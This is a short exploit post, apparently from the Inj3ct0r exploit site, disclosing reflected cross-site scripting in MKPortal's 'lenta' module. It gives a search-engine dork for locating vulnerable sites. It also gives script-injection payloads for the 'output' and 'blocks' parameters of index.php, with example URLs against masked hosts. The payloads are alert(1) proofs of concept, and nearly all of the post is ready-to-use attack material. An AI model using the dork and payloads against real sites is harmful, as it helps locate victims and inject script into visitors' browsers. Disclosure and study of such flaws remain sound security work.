MKPortal lenta module XSS Vulnerability

=======================================
MKPortal lenta module XSS Vulnerability
=======================================


#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


##################################################
Vulnerable products: MKPortal module lenta Exploit
Dork: "inurl:index.php?ind=" graber lenta
##################################################

1. Multiple pXSS
Vulnerability in the file index.php.

Exploit: 

/index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E

Example:

http://www.xxxxxxxxxxxxxxxu/index.php?ind=lentanews&output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxu/index.php?ind=lentanews&blocks=%3Cscript%3Ealert(1)%3C/script%3E